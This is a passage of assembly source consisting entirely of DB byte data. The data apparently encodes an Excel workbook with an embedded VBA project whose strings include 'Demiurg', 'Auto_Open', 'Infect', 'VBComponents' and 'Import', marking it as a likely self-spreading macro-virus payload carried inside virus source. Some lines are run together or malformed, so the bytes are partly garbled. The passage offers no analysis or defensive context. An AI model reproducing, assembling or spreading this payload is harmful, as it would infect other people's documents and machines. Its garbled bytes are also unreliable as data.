DB 045H, 000H, 049H, 000H, 045H, 000H, 04EH, 000H
DB 05CH, 000H, 04DH, 000H, 049H, 000H, 043H, 000H
DB 052H, 000H, 04FH, 000H, 053H, 000H, 04FH, 000H
DB 046H, 000H, 054H, 000H, 020H, 000H, 053H, 000H
DB 048H, 000H, 041H, 000H, 052H, 000H, 045H, 000H
DB 044H, 000H, 05CH, 000H, 056H, 000H, 042H, 000H
DB 041H, 000H, 05CH, 000H, 056H, 000H, 042H, 000H
DB 041H, 000H, 033H, 000H, 033H, 000H, 032H, 000H
DB 02EH, 000H, 044H, 000H, 04CH, 000H, 04CH, 000H
DB 023H, 000H, 056H, 000H, 069H, 000H, 073H, 000H
DB 075H, 000H, 061H, 000H, 06CH, 000H, 020H, 000H
DB 042H, 000H, 061H, 000H, 073H, 000H, 069H, 000H
DB 063H, 000H, 020H, 000H, 046H, 000H, 06FH, 000H
DB 072H, 000H, 020H, 000H, 041H, 000H, 070H, 000H
DB 070H, 000H, 06CH, 000H, 069H, 000H, 063H, 000HDB 061H, 000H, 074H, 000H, 069H, 000H, 06FH, 000H
DB 06EH, 000H, 073H, 0E6H, 00DH, 000H, 004H, 001H
DB 02AH, 000H, 05CH, 000H, 047H, 000H, 07BH, 000H
DB 030H, 000H, 030H, 000H, 030H, 000H, 032H, 000H
DB 030H, 000H, 038H, 000H, 031H, 000H, 033H, 000H
DB 02DH, 000H, 030H, 000H, 030H, 000H, 030H, 000H
DB 030H, 000H, 02DH, 000H, 030H, 000H, 030H, 000H
DB 030H, 000H, 030H, 000H, 02DH, 000H, 043H, 000H
DB 030H, 000H, 030H, 000H, 030H, 000H, 02DH, 000H
DB 030H, 000H, 030H, 000H, 030H, 000H, 030H, 000H
DB 030H, 000H, 030H, 000H, 030H, 000H, 030H, 000H
DB 030H, 000H, 030H, 000H, 034H, 000H, 036H, 000H
DB 07DH, 000H, 023H, 000H, 031H, 000H, 02EH, 000H
DB 032H, 000H, 023H, 000H, 030H, 000H, 023H, 000H
DB 043H, 000H, 03AH, 000H, 05CH, 000H, 050H, 000H
DB 072H, 000H, 06FH, 000H, 067H, 000H, 072H, 000H
DB 061H, 000H, 06DH, 000H, 06DH, 000H, 065H, 000H
DB 05CH, 000H, 04DH, 000H, 069H, 000H, 063H, 000H
DB 072H, 000H, 06FH, 000H, 073H, 000H, 06FH, 000H
DB 066H, 000H, 074H, 000H, 020H, 000H, 04FH, 000H
DB 066H, 000H, 066H, 000H, 069H, 000H, 063H, 000H
DB 065H, 000H, 05CH, 000H, 04FH, 000H, 066H, 000H
DB 066H, 000H, 069H, 000H, 063H, 000H, 065H, 000H
DB 05CH, 000H, 045H, 000H, 058H, 000H, 043H, 000H
DB 045H, 000H, 04CH, 000H, 038H, 000H, 02EH, 000H
DB 04FH, 000H, 04CH, 000H, 042H, 000H, 023H, 000H
DB 04DH, 000H, 069H, 000H, 063H, 000H, 072H, 000H
DB 06FH, 000H, 073H, 000H, 06FH, 000H, 066H, 000H
DB 074H, 000H, 020H, 000H, 045H, 000H, 078H, 000H
DB 063H, 000H, 065H, 000H, 06CH, 000H, 020H, 000H
DB 038H, 000H, 02EH, 000H, 030H, 000H, 020H, 000H
DB 04FH, 000H, 062H, 000H, 06AH, 000H, 065H, 000H
DB 063H, 000H, 074H, 000H, 020H, 000H, 04CH, 000H
DB 069H, 000H, 062H, 000H, 072H, 000H, 061H, 000HDB 072H, 000H, 079H, 0E6H, 00DH, 000H, 0B8H, 000H
DB 02AH, 000H, 05CH, 000H, 047H, 000H, 07BH, 000H
DB 030H, 000H, 030H, 000H, 030H, 000H, 032H, 000H
DB 030H, 000H, 034H, 000H, 033H, 000H, 030H, 000H
DB 02DH, 000H, 030H, 000H, 030H, 000H, 030H, 000H
DB 030H, 000H, 02DH, 000H, 030H, 000H, 030H, 000H
DB 030H, 000H, 030H, 000H, 02DH, 000H, 043H, 000H
DB 030H, 000H, 030H, 000H, 030H, 000H, 02DH, 000H
DB 030H, 000H, 030H, 000H, 030H, 000H, 030H, 000H
DB 030H, 000H, 030H, 000H, 030H, 000H, 030H, 000H
DB 030H, 000H, 030H, 000H, 034H, 000H, 036H, 000H
DB 07DH, 000H, 023H, 000H, 032H, 000H, 02EH, 000H
DB 030H, 000H, 023H, 000H, 030H, 000H, 023H, 000H
DB 043H, 000H, 03AH, 000H, 05CH, 000H, 057H, 000H
DB 049H, 000H, 04EH, 000H, 044H, 000H, 04FH, 000H
DB 057H, 000H, 053H, 000H, 05CH, 000H, 053H, 000H
DB 059H, 000H, 053H, 000H, 054H, 000H, 045H, 000H
DB 04DH, 000H, 05CH, 000H, 053H, 000H, 054H, 000H
DB 044H, 000H, 04FH, 000H, 04CH, 000H, 045H, 000H
DB 032H, 000H, 02EH, 000H, 054H, 000H, 04CH, 000H
DB 042H, 000H, 023H, 000H, 04FH, 000H, 04CH, 000H
DB 045H, 000H, 020H, 000H, 041H, 000H, 075H, 000H
DB 074H, 000H, 06FH, 000H, 06DH, 000H, 061H, 000H
DB 074H, 000H, 069H, 000H, 06FH, 000H, 06EH, 0E6H
DB 00DH, 000H, 0E0H, 000H, 02AH, 000H, 05CH, 000H
DB 047H, 000H, 07BH, 000H, 036H, 000H, 032H, 000H
DB 041H, 000H, 033H, 000H, 032H, 000H, 043H, 000H
DB 036H, 000H, 032H, 000H, 02DH, 000H, 041H, 000H
DB 033H, 000H, 036H, 000H, 044H, 000H, 02DH, 000H
DB 031H, 000H, 031H, 000H, 044H, 000H, 033H, 000H
DB 02DH, 000H, 041H, 000H, 035H, 000H, 030H, 000H
DB 030H, 000H, 02DH, 000H, 041H, 000H, 036H, 000H
DB 046H, 000H, 033H, 000H, 044H, 000H, 044H, 000H
DB 041H, 000H, 044H, 000H, 038H, 000H, 032H, 000HDB 033H, 000H, 039H, 000H, 07DH, 000H, 023H, 000H
DB 032H, 000H, 02EH, 000H, 030H, 000H, 023H, 000H
DB 030H, 000H, 023H, 000H, 043H, 000H, 03AH, 000H
DB 05CH, 000H, 057H, 000H, 049H, 000H, 04EH, 000H
DB 044H, 000H, 04FH, 000H, 057H, 000H, 053H, 000H
DB 05CH, 000H, 053H, 000H, 059H, 000H, 053H, 000H
DB 054H, 000H, 045H, 000H, 04DH, 000H, 05CH, 000H
DB 04DH, 000H, 053H, 000H, 046H, 000H, 06FH, 000H
DB 072H, 000H, 06DH, 000H, 073H, 000H, 02EH, 000H
DB 054H, 000H, 057H, 000H, 044H, 000H, 023H, 000H
DB 04DH, 000H, 069H, 000H, 063H, 000H, 072H, 000H
DB 06FH, 000H, 073H, 000H, 06FH, 000H, 066H, 000H
DB 074H, 000H, 020H, 000H, 046H, 000H, 06FH, 000H
DB 072H, 000H, 06DH, 000H, 073H, 000H, 020H, 000H
DB 032H, 000H, 02EH, 000H, 030H, 000H, 020H, 000H
DB 04FH, 000H, 062H, 000H, 06AH, 000H, 065H, 000H
DB 063H, 000H, 074H, 000H, 020H, 000H, 04CH, 000H
DB 069H, 000H, 062H, 000H, 072H, 000H, 061H, 000H
DB 072H, 000H, 079H, 0E6H, 00BH, 000H, 001H, 000H
DB 0E4H, 000H, 02AH, 000H, 05CH, 000H, 047H, 000H
DB 07BH, 000H, 036H, 000H, 032H, 000H, 041H, 000H
DB 033H, 000H, 032H, 000H, 043H, 000H, 036H, 000H
DB 033H, 000H, 02DH, 000H, 041H, 000H, 033H, 000H
DB 036H, 000H, 044H, 000H, 02DH, 000H, 031H, 000H
DB 031H, 000H, 044H, 000H, 033H, 000H, 02DH, 000H
DB 081H, 000H, 000H, 000H, 082H, 000H, 000H, 000H
DB 083H, 000H, 000H, 000H, 084H, 000H, 000H, 000H
DB 085H, 000H, 000H, 000H, 086H, 000H, 000H, 000H
DB 087H, 000H, 000H, 000H, 088H, 000H, 000H, 000H
DB 089H, 000H, 000H, 000H, 08AH, 000H, 000H, 000H
DB 08BH, 000H, 000H, 000H, 08CH, 000H, 000H, 000H
DB 08DH, 000H, 000H, 000H, 08EH, 000H, 000H, 000H
DB 08FH, 000H, 000H, 000H, 090H, 000H, 000H, 000H
DB 091H, 000H, 000H, 000HDB 093H, 000H, 000H, 000H, 094H, 000H, 000H, 000H
DB 095H, 000H, 000H, 000H, 096H, 000H, 000H, 000H
DB 097H, 000H, 000H, 000H, 098H, 000H, 000H, 000H
DB 0FEH, 0FFH, 0FFH, 0FFH, 09AH, 000H, 000H, 000H
DB 09BH, 000H, 000H, 000H, 09CH, 000H, 000H, 000H
DB 09DH, 000H, 000H, 000H, 09EH, 000H, 000H, 000H
DB 09FH, 000H, 000H, 000H, 0A0H, 000H, 000H, 000H
DB 0A1H, 000H, 000H, 000H, 0A2H, 000H, 000H, 000H
DB 0A3H, 000H, 000H, 000H, 0A4H, 000H, 000H, 000H
DB 0FEH, 0FFH, 0FFH, 0FFH, 0A6H, 000H, 000H, 000H
DB 0FEH, 0FFH, 0FFH, 0FFH, 0A8H, 000H, 000H, 000H
DB 0A9H, 000H, 000H, 000H, 0AH, 000H, 000H, 000H
DB 0ABH, 000H, 000H, 000H, 0ACH, 000H, 000H, 000H
DB 0ADH, 000H, 000H, 000H, 0FEH, 0FFH, 0FFH, 0FFH
DB 0AFH, 000H, 000H, 000H, 0B0H, 000H, 000H, 000H
DB 0FEH, 0FFH, 0FFH, 0FFH, 0B2H, 000H, 000H, 000H
DB 0B3H, 000H, 000H, 000H, 0B4H, 000H, 000H, 000H
DB 0B5H, 000H, 000H, 000H, 0B6H, 000H, 000H, 000H
DB 0B7H, 000H, 000H, 000H, 0FEH, 0FFH, 0FFH, 0FFH
DB 0B9H, 000H, 000H, 000H, 0FEH, 0E6H, 0FFH, 0FFH
DB 0E6H, 01CH, 0FFH, 041H, 000H, 035H, 000H, 030H
DB 000H, 030H, 000H, 02DH, 000H, 041H, 000H, 036H
DB 000H, 046H, 000H, 033H, 000H, 044H, 000H, 044H
DB 000H, 041H, 000H, 044H, 000H, 038H, 000H, 032H
DB 000H, 033H, 000H, 039H, 000H, 07DH, 000H, 023H
DB 000H, 032H, 000H, 02EH, 000H, 030H, 000H, 023H
DB 000H, 030H, 000H, 023H, 000H, 043H, 000H, 03AH
DB 000H, 05CH, 000H, 057H, 000H, 049H, 000H, 04EH
DB 000H, 044H, 000H, 04FH, 000H, 057H, 000H, 053H
DB 000H, 05CH, 000H, 054H, 000H, 045H, 000H, 04DH
DB 000H, 050H, 000H, 05CH, 000H, 056H, 000H, 042H
DB 000H, 045H, 000H, 05CH, 000H, 04DH, 000H, 053H
DB 000H, 046H, 000H, 06FH, 000H, 072H, 000H, 06DH
DB 000H, 073H, 000H, 02EH, 000H, 045H, 000H, 058HDB 000H, 044H, 000H, 023H, 000H, 04DH, 000H, 069H
DB 000H, 063H, 000H, 072H, 000H, 06FH, 000H, 073H
DB 000H, 06FH, 000H, 066H, 000H, 074H, 000H, 020H
DB 000H, 046H, 000H, 06FH, 000H, 072H, 000H, 06DH
DB 000H, 073H, 000H, 020H, 000H, 032H, 000H, 02EH
DB 000H, 030H, 000H, 020H, 000H, 04FH, 000H, 062H
DB 000H, 06AH, 000H, 065H, 000H, 063H, 000H, 074H
DB 000H, 020H, 000H, 04CH, 000H, 069H, 000H, 062H
DB 000H, 072H, 000H, 061H, 000H, 072H, 000H, 079H
DB 0E6H, 00BH, 000H, 001H, 000H, 000H, 000H, 0e1H
DB 02EH, 045H, 00DH, 08FH, 0E0H, 01AH, 010H, 085H
DB 02EH, 002H, 060H, 08CH, 04DH, 00BH, 0B4H, 000H
DB 000H, 004H, 001H, 02AH, 000H, 05CH, 000H, 047H
DB 000H, 07BH, 000H, 032H, 000H, 044H, 000H, 046H
DB 000H, 038H, 000H, 044H, 000H, 030H, 000H, 034H
DB 000H, 043H, 000H, 02DH, 000H, 035H, 000H, 042H
DB 000H, 046H, 000H, 041H, 000H, 02DH, 000H, 031H
DB 000H, 030H, 000H, 031H, 000H, 042H, 000H, 02DH
DB 000H, 042H, 000H, 044H, 000H, 045H, 000H, 035H
DB 000H, 02DH, 000H, 030H, 000H, 030H, 000H, 041H
DB 000H, 041H, 000H, 030H, 000H, 030H, 000H, 034H
DB 000H, 034H, 000H, 044H, 000H, 045H, 000H, 035H
DB 000H, 032H, 000H, 07DH, 000H, 023H, 000H, 032H
DB 000H, 02EH, 000H, 030H, 000H, 023H, 000H, 030H
DB 000H, 023H, 000H, 043H, 000H, 03AH, 000H, 05CH
DB 000H, 050H, 000H, 052H, 000H, 04FH, 000H, 047H
DB 000H, 052H, 000H, 041H, 000H, 04DH, 000H, 04DH
DB 000H, 045H, 000H, 05CH, 000H, 04DH, 000H, 049H
DB 000H, 043H, 000H, 052H, 000H, 04FH, 000H, 053H
DB 000H, 04FH, 000H, 046H, 000H, 054H, 000H, 020H
DB 000H, 04FH, 000H, 046H, 000H, 046H, 000H, 049H
DB 000H, 043H, 000H, 045H, 000H, 05CH, 000H, 04FH
DB 000H, 046H, 000H, 046H, 000H, 049H, 000H, 043H
DB 000H, 045H, 000H, 05CH, 000H, 04DH, 000H, 053HDB 000H, 04FH, 000H, 039H, 000H, 037H, 000H, 02EH
DB 000H, 044H, 000H, 04CH, 000H, 04CH, 000H, 023H
DB 000H, 04DH, 000H, 069H, 000H, 063H, 000H, 072H
DB 000H, 06FH, 000H, 073H, 000H, 06FH, 000H, 066H
DB 000H, 074H, 000H, 020H, 000H, 04FH, 000H, 066H
DB 000H, 066H, 000H, 069H, 000H, 063H, 000H, 065H
DB 000H, 020H, 000H, 038H, 000H, 02EH, 000H, 030H
DB 000H, 020H, 000H, 04FH, 000H, 062H, 000H, 06AH
DB 000H, 065H, 000H, 063H, 000H, 074H, 000H, 020H
DB 000H, 04CH, 000H, 069H, 000H, 062H, 000H, 072H
DB 000H, 061H, 000H, 072H, 000H, 079H, 0E6H, 00DH
DB 000H, 003H, 000H, 002H, 000H, 002H, 000H, 001H
DB 000H, 003H, 000H, 004H, 002H, 000H, 000H, 006H
DB 002H, 001H, 000H, 008H, 002H, 000H, 000H, 010H
DB 002H, 0E6H, 006H, 0FFH, 0E6H, 004H, 000H, 0FFH
DB 0FFH, 000H, 000H, 0E8H, 005H, 0C0H, 038H, 003H
DB 000H, 0E6H, 00AH, 0FFH, 000H, 000H, 001H, 000H
DB 0E6H, 026H, 0FFH, 002H, 000H, 0E6H, 00ah, 0FFH
DB 001H, 0E6H, 013H, 000H, 0B5H, 031H, 003H, 000H
DB 022H, 000H, 044H, 000H, 069H, 000H, 065H, 000H
DB 073H, 000H, 065H, 000H, 041H, 000H, 072H, 000H
DB 062H, 000H, 065H, 000H, 069H, 000H, 074H, 000H
DB 073H, 000H, 06DH, 000H, 061H, 000H, 070H, 000H
DB 070H, 000H, 065H, 000H, 00ah, 000H, 034H, 033H
DB 038H, 063H, 030H, 030H, 035H, 065H, 038H, 000H
DB 003H, 000H, 02AH, 044H, 001H, 015H, 002H, 0FFH
DB 0FFH, 0B7H, 031H, 0E6H, 007H, 000H, 002H, 000H
DB 000H, 000H, 01FH, 003H, 000H, 000H, 0FFH, 0FFH
DB 010H, 000H, 054H, 000H, 061H, 000H, 062H, 000H
DB 065H, 000H, 06CH, 000H, 06CH, 000H, 065H, 000H
DB 031H, 000H, 00ah, 000H, 035H, 033H, 038H, 063H
DB 030H, 030H, 035H, 065H, 038H, 000H, 003H, 000H
DB 02AH, 044H, 001H, 019H, 002H, 0FFH, 0FFH, 0B9H
DB 031H, 0E6H, 006H, 000H, 018H, 002H, 000H, 000HDB 000H, 01FH, 003H, 000H, 000H, 0FFH, 0FFH, 00EH
DB 000H, 044H, 000H, 065H, 000H, 06DH, 000H, 069H
DB 000H, 075H, 000H, 072H, 000H, 067H, 000H, 00ah
DB 000H, 064H, 033H, 038H, 063H, 030H, 030H, 035H
DB 066H, 036H, 000H, 003H, 000H, 02AH, 044H, 001H
DB 01CH, 002H, 0FFH, 0FFH, 0BBH, 031H, 0E6H, 006H
DB 000H, 030H, 002H, 000H, 000H, 000H, 0B7H, 005H
DB 000H, 000H, 0E6H, 006H, 0FFH, 001H, 001H, 050H
DB 002H, 000H, 000H, 0E6H, 0D8H, 0FFH, 000H, 002H
DB 000H, 000H, 0E6H, 004H, 0FFH, 018H, 002H, 000H
DB 000H, 0E6H, 004H, 0FFH, 030H, 002H, 000H, 000H
DB 0E6H, 0FFH, 0FFH, 0E6H, 015H, 0FFH, 0E7H, 06EH
DB 0E4H, 0D9H, 03AH, 0F1H, 0D3H, 011H, 0A5H, 001H
DB 0A6H, 0F3H, 0DDH, 0ADH, 082H, 039H, 0E6H, 004H
DB 0FFH, 001H, 000H, 000H, 000H, 0E9H, 06EH, 0E4H
DB 0D9H, 03AH, 0F1H, 0D3H, 011H, 0A5H, 001H, 0A6H
DB 0F3H, 0DDH, 0ADH, 082H, 039H, 0E6H, 004H, 0FFH
DB 001H, 000H, 000H, 000H, 0EBH, 06EH, 0E4H, 0D9H
DB 03AH, 0F1H, 0D3H, 011H, 0A5H, 001H, 0A6H, 0F3H
DB 0DDH, 0ADH, 082H, 039H, 0E6H, 004H, 0FFH, 001H
DB 000H, 000H, 000H, 0E6H, 004H, 0FFH, 030H, 000H
DB 000H, 000H, 080H, 0E6H, 005H, 000H, 020H, 001H
DB 021H, 000H, 0FFH, 000H, 0B8H, 028H, 000H, 000H
DB 005H, 004H, 045H, 078H, 063H, 065H, 06CH, 080H
DB 02BH, 010H, 000H, 003H, 004H, 056H, 042H, 041H
DB 0F7H, 0E2H, 010H, 000H, 005H, 004H, 057H, 069H
DB 06EH, 031H, 036H, 0C1H, 07EH, 010H, 000H, 005H
DB 004H, 057H, 069H, 06EH, 033H, 032H, 007H, 07FH
DB 010H, 000H, 003H, 004H, 04DH, 061H, 063H, 0B3H
DB 0B2H, 010H, 000H, 008H, 004H, 050H, 072H, 06FH
DB 06AH, 065H, 06BH, 074H, 031H, 0D2H, 041H, 010H
DB 000H, 006H, 004H, 073H, 074H, 064H, 06FH, 06CH
DB 065H, 093H, 060H, 010H, 000H, 007H, 000H, 04DH
DB 053H, 046H, 06FH, 072H, 06DH, 073H, 043H, 00 FHDB 010H, 000H, 00ah, 004H, 056H, 042H, 041H, 050H
DB 072H, 06FH, 06AH, 065H, 063H, 074H, 0BEH, 0BFH
DB 010H, 000H, 006H, 004H, 04FH, 066H, 066H, 069H
DB 063H, 065H, 015H, 075H, 010H, 000H, 011H, 004H
DB 044H, 069H, 065H, 073H, 065H, 041H, 072H, 062H
DB 065H, 069H, 074H, 073H, 06DH, 061H, 070H, 070H
DB 065H, 0AFH, 081H, 010H, 000H, 009H, 080H, 000H
DB 000H, 0FFH, 003H, 001H, 000H, 05FH, 045H, 076H
DB 061H, 06CH, 075H, 061H, 074H, 065H, 018H, 0D9H
DB 010H, 000H, 008H, 004H, 054H, 061H, 062H, 065H
DB 06CH, 06CH, 065H, 031H, 052H, 08AH, 010H, 000H
DB 006H, 004H, 04DH, 06FH, 064H, 075H, 06CH, 031H
DB 0CDH, 01EH, 010H, 000H, 007H, 004H, 044H, 065H
DB 06DH, 069H, 075H, 072H, 067H, 01DH, 017H, 010H
DB 000H, 009H, 004H, 041H, 075H, 074H, 06FH, 05FH
DB 04FH, 070H, 065H, 06EH, 056H, 020H, 010H, 000H
DB 00BH, 000H, 041H, 070H, 070H, 06CH, 069H, 063H
DB 061H, 074H, 069H, 06FH, 06EH, 0A5H, 02AH, 010H
DB 000H, 00FH, 000H, 04FH, 06EH, 053H, 068H, 065H
DB 065H, 074H, 041H, 063H, 074H, 069H, 076H, 061H
DB 074H, 065H, 0FAH, 06EH, 010H, 000H, 00ah, 004h
DB 041H, 075H, 074H, 06FH, 05FH, 043H, 06CH, 06FH
DB 073H, 065H, 077H, 080H, 010H, 000H, 00CH, 000H
DB 041H, 063H, 074H, 069H, 076H, 065H, 057H, 069H
DB 06EH, 064H, 06FH, 077H, 0C3H, 02BH, 010H, 000H
DB 007H, 000H, 056H, 069H, 073H, 069H, 062H, 06CH
DB 065H, 0B6H, 0D3H, 010H, 000H, 006H, 004H, 049H
DB 06EH, 066H, 065H, 063H, 074H, 0E8H, 066H, 010H
DB 000H, 00DH, 000H, 044H, 069H, 073H, 070H, 06CH
DB 061H, 079H, 041H, 06CH, 065H, 072H, 074H, 073H
DB 0F4H, 0F6H, 010H, 000H, 008H, 000H, 06CH, 061H
DB 073H, 074H, 063H, 068H, 061H, 072H, 013H, 09AH
DB 010H, 000H, 003H, 000H, 041H, 073H, 063H, 021H
DB 075H, 010H, 000H, 00Eh, 000H, 041H, 063H, 074HDB 069H, 076H, 065H, 057H, 06FH, 072H, 06BH, 062H
DB 06FH, 06FH, 06BH, 013H, 0A2H, 010H, 000H, 001H
DB 000H, 069H, 060H, 010H, 010H, 000H, 009H, 000H
DB 056H, 042H, 050H, 072H, 06FH, 06AH, 065H, 063H
DB 074H, 04FH, 068H, 010H, 000H, 00CH, 000H, 056H
DB 042H, 043H, 06FH, 06DH, 070H, 06FH, 06EH, 065H
DB 06EH, 074H, 073H, 00ah, 027H, 010H, 000H, 005H
DB 000H, 063H, 06FH, 075H, 06EH, 074H, 030H, 076H
DB 010H, 000H, 006H, 000H, 049H, 06DH, 070H, 06FH
DB 072H, 074H, 069H, 0C5H, 010H, 000H, 004H, 000H
DB 053H, 061H, 076H, 065H, 092H, 0D0H, 010H, 000H
DB 008H, 004H, 057H, 06FH, 072H, 06BH, 062H, 06FH
DB 06FH, 06BH, 06BH, 018H, 010H, 000H, 002H, 0FFH
DB 0FFH, 001H, 001H, 06CH, 000H, 000H, 000H, 01DH
DB 002H, 002H, 000H, 010H, 000H, 0E6H, 012H, 0FFH
DB 000H, 002H, 001H, 000H, 0FFH, 0FFH, 002H, 002H
DB 000H, 000H, 0E6H, 01AH, 0FFH, 00CH, 002H, 002H
DB 000H, 0FFH, 0FFH, 00EH, 002H, 003H, 000H, 0FFH
DB 0FFH, 010H, 002H, 0E6H, 004H, 0FFH, 012H, 002H
DB 004H, 000H, 0FFH, 0FFH, 015H, 002H, 000H, 000H
DB 00Eh, 000H, 0E6H, 006H, 0FFH, 019H, 002H, 001H
DB 000H, 00EH, 000H, 0E6H, 006H, 0FFH, 000H, 000H
DB 012H, 000H, 000H, 000H, 001H, 000H, 036H, 0E6H
DB 060H, 000H, 001H, 0C6H, 0B2H, 080H, 001H, 000H
DB 004H, 000H, 000H, 000H, 001H, 000H, 030H, 02AH
DB 002H, 002H, 090H, 009H, 000H, 070H, 014H, 006H
DB 048H, 003H, 000H, 082H, 002H, 000H, 064H, 0E4H
DB 004H, 004H, 000H, 00ah, 000H, 01CH, 000H, 056H
DB 042H, 041H, 050H, 072H, 06FH, 06AH, 065H, 088H
DB 063H, 074H, 005H, 000H, 034H, 000H, 000H, 040H
DB 002H, 014H, 06AH, 006H, 002H, 00ah, 03DH, 002H
DB 00AH, 007H, 002H, 072H, 001H, 014H, 008H, 005H
DB 006H, 012H, 009H, 002H, 012H, 0E8H, 005H, 0C0H
DB 038H, 003H, 094H, 000H, 00CH, 002H, 04AH, 03CHDB 002H, 00AH, 016H, 000H, 001H, 072H, 080H, 073H
DB 074H, 064H, 06FH, 06CH, 065H, 03EH, 002H, 019H
DB 000H, 073H, 000H, 074H, 000H, 064H, 000H, 06FH
DB 000H, 080H, 06CH, 000H, 065H, 000H, 00DH, 000H
DB 066H, 000H, 025H, 002H, 05CH, 000H, 003H, 02AH
DB 05CH, 047H, 07BH, 030H, 030H, 080H, 030H, 032H
DB 030H, 034H, 033H, 030H, 02DH, 000H, 008H, 01DH
DB 004H, 004H, 043H, 000H, 00ah, 002H, 00Eh, 001H
DB 012H, 030H, 030H, 034H, 000H, 036H, 07DH, 023H
DB 032H, 02EH, 030H, 023H, 030H, 000H, 023H, 043H
DB 03AH, 05CH, 057H, 049H, 04EH, 044H, 000H, 04FH
DB 057H, 053H, 05CH, 053H, 059H, 053H, 054H, 000H
DB 045H, 04DH, 05CH, 053H, 054H, 044H, 04FH, 04CH
DB 080H, 045H, 032H, 02EH, 054H, 04CH, 042H, 023H
DB 000H, 008H, 000H, 020H, 041H, 075H, 074H, 06FH
DB 06DH, 061H, 074H, 018H, 069H, 06FH, 06EH, 000H
DB 05EH, 000H, 001H, 016H, 000H, 007H, 001H, 080H
DB 002H, 04DH, 053H, 046H, 06FH, 072H, 06DH, 073H
DB 008H, 03EH, 000H, 00EH, 001H, 006H, 000H, 053H
DB 000H, 046H, 001H, 000H, 045H, 072H, 000H, 06DH
DB 000H, 073H, 000H, 02FH, 034H, 000H, 07AH, 080H
DB 009H, 070H, 080H, 001H, 001H, 046H, 036H, 032H
DB 000H, 041H, 033H, 032H, 043H, 036H, 032H, 02DH
DB 041H, 000H, 033H, 036H, 044H, 02DH, 031H, 031H
DB 044H, 033H, 000H, 02DH, 041H, 035H, 030H, 030H
DB 02DH, 041H, 036H, 000H, 046H, 033H, 044H, 044H
DB 041H, 044H, 038H, 032H, 00CH, 033H, 039H, 017H
DB 046H, 004H, 033H, 02EH, 054H, 057H, 044H, 000H
DB 023H, 04DH, 069H, 063H, 072H, 06FH, 073H, 06FH
DB 028H, 066H, 074H, 020H, 002H, 03DH, 020H, 000H
DB 060H, 020H, 04FH, 002H, 062H, 001H, 0B0H, 020H
DB 04CH, 069H, 062H, 072H, 061H, 01CH, 072H, 079H
DB 000H, 039H, 000H, 001H, 01EH, 050H, 030H, 000H
DB 090H, 07DH, 000H, 013H, 072H, 080H, 001H, 008HDB 050H, 000H, 04BH, 02AH, 050H, 080H, 04AH, 050H
DB 020H, 05CH, 056H, 042H, 045H, 05CH, 085H, 028H
DB 045H, 058H, 001H, 0A7H, 028H, 0E1H, 02EH, 045H
DB 00DH, 08FH, 0E0H, 01AH, 000H, 010H, 085H, 02EH
DB 002H, 060H, 08CH, 04DH, 00BH, 006H, 0B4H, 041H
DB 094H, 043H, 078H, 04FH, 066H, 066H, 069H, 063H
DB 005H, 044H, 078H, 04FH, 040H, 075H, 066H, 000H
DB 069H, 000H, 063H, 015H, 042H, 078H, 08CH, 0C0H
DB 02BH, 082H, 0C4H, 02CH, 032H, 044H, 046H, 000H
DB 038H, 044H, 030H, 034H, 043H, 02DH, 035H, 042H
DB 000H, 046H, 041H, 02DH, 031H, 030H, 031H, 042H
DB 02DH, 090H, 064H, 000H, 069H, 000H, 072H, 0E6H
DB 03BH, 000H, 008H, 000H, 002H, 000H, 0E6H, 00CH
DB 0FFH, 0E6H, 024H, 000H, 099H, 000H, 000H, 000H
DB 0CAH, 002H, 0E6H, 006H, 000H, 050H, 000H, 052H
DB 000H, 04FH, 000H, 04AH, 000H, 045H, 000H, 043H
DB 000H, 054H, 000H, 077H, 000H, 06DH, 0E6H, 02FH
DB 000H, 014H, 000H, 002H, 000H, 0E6H, 00CH, 0FFH
DB 0E6H, 024H, 000H, 0A5H, 000H, 000H, 000H, 06BH
DB 0E6H, 007H, 000H, 050H, 000H, 052H, 000H, 04FH
DB 000H, 04AH, 000H, 045H, 000H, 043H, 000H, 054H
DB 0E6H, 033H, 000H, 010H, 000H, 002H, 001H, 003H
DB 000H, 000H, 000H, 009H, 000H, 000H, 000H, 0E6H
DB 004H, 0FFH, 0E6H, 024H, 000H, 0A7H, 000H, 000H
DB 000H, 0B8H, 001H, 0E6H, 006H, 000H, 005H, 000H
DB 053H, 000H, 075H, 000H, 06DH, 000H, 06DH, 000H
DB 061H, 000H, 072H, 000H, 079H, 000H, 049H, 000H
DB 06EH, 000H, 066H, 000H, 06FH, 000H, 072H, 000H
DB 06DH, 000H, 061H, 000H, 074H, 000H, 069H, 000H
DB 06FH, 000H, 06EH, 0E6H, 01BH, 000H, 028H, 000H
DB 002H, 001H, 0E6H, 004H, 0FFH, 00CH, 000H, 000H
DB 000H, 0E6H, 004H, 0FFH, 0E6H, 024H, 000H, 0AEH
DB 000H, 000H, 000H, 0B4H, 0E6H, 007H, 000H, 042H
DB 044H, 045H, 035H, 040H, 078H, 041H, 041H, 040HDB 077H, 00AH, 034H, 0C0H, 002H, 032H, 008H, 055H
DB 050H, 052H, 04FH, 047H, 010H, 052H, 041H, 04DH
DB 04DH, 000H, 02BH, 049H, 043H, 052H, 000H, 04FH
DB 053H, 04FH, 046H, 054H, 020H, 04FH, 046H, 020H
DB 046H, 049H, 043H, 045H, 05CH, 084H, 001H, 04DH
DB 053H, 080H, 04FH, 039H, 037H, 02EH, 044H, 04CH
DB 04CH, 048H, 059H, 0A1H, 083H, 022H, 020H, 038H
DB 02EH, 030H, 092H, 059H, 00FH, 042H, 0BBH, 008H
DB 003H, 000H, 013H, 0C2H, 001H, 0B5H, 031H, 019H
DB 000H, 002H, 011H, 040H, 027H, 044H, 069H, 065H
DB 073H, 065H, 041H, 000H, 072H, 062H, 065H, 069H
DB 074H, 073H, 06DH, 061H, 010H, 070H, 070H, 065H
DB 01AH, 093H, 005H, 032H, 000H, 022H, 00BH, 041H
DB 00BH, 040H, 037H, 065H, 080H, 08CH, 065H, 000H
DB 041H, 000H, 0A8H, 072H, 000H, 062H, 0C0H, 039H
DB 069H, 040H, 0B5H, 073H, 080H, 091H, 088H, 061H
DB 000H, 070H, 040H, 000H, 065H, 000H, 01CH, 040H
DB 009H, 028H, 000H, 000H, 048H, 042H, 001H, 031H
DB 0C2H, 0C6H, 01FH, 003H, 058H, 000H, 000H, 01EH
DB 042H, 002H, 001H, 005H, 02CH, 042H, 01FH, 0B7H
DB 022H, 031H, 041H, 013H, 000H, 000H, 02BH, 0C2H
DB 009H, 019H, 000H, 002H, 008H, 0C0H, 001H, 054H
DB 061H, 062H, 065H, 06CH, 06CH, 088H, 065H, 031H
DB 01AH, 04AH, 003H, 032H, 000H, 010H, 0C1H, 006H
